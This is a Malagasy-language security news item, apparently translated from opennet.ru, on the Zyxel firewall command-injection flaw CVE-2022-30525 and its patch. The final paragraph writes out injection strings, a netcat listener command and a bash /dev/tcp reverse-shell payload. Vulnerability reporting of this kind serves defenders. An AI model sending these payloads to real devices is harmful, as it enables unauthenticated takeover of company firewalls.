Misy vulnerability (CVE-2022-30525) hita ao amin'ny fitaovana Zyxel amin'ny andiany ATP, VPN ary USG FLEX, natao handaminana ny fiasan'ny firewall, IDS ary VPN amin'ny orinasa, izay ahafahan'ny mpanafika ivelany manatanteraka ny kaody amin'ny fitaovana tsy misy zon'ny mpampiasa tsy misy fanamarinana. Mba hanatanterahana fanafihana, ny mpanafika dia tsy maintsy afaka mandefa fangatahana amin'ny fitaovana mampiasa ny protocol HTTP/HTTPS. Zyxel dia nanamboatra ny vulnerability amin'ny fanavaozana firmware ZLD 5.30. Araka ny voalazan'ny serivisy Shodan, misy 16213 amin'izao fotoana izao ireo fitaovana mety ho marefo amin'ny tambajotra manerantany izay manaiky ny fangatahana amin'ny HTTP/HTTPS.
Ny fampandehanana dia atao amin'ny alΓ lan'ny fandefasana baiko natao manokana ho an'ny mpitantana tranonkala /ztp/cgi-bin/handler, azo idirana tsy misy fanamarinana. Ny olana dia vokatry ny tsy fisian'ny fanadiovana araka ny tokony ho izy ny mari-pamantarana fangatahana rehefa manatanteraka baiko amin'ny rafitra amin'ny fampiasana ny antso os.system ampiasaina ao amin'ny tranomboky lib_wan_settings.py ary novonoina tamin'ny fanodinana ny hetsika setWanPortSt.
Ohatra, ny mpanafika dia afaka mandalo ny tady "; ping 192.168.1.210;" izay hitarika amin'ny fanatanterahana ny baiko "ping 192.168.1.210" amin'ny rafitra. Mba hahazoana fidirana amin'ny baiko shell dia azonao atao ny mampandeha ny "nc -lvnp 1270" amin'ny rafitrao, ary avy eo dia manomboka fifandraisana mivadika amin'ny alΓ lan'ny fandefasana fangatahana amin'ny fitaovana miaraka amin'ny '; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.
Source: opennet.ru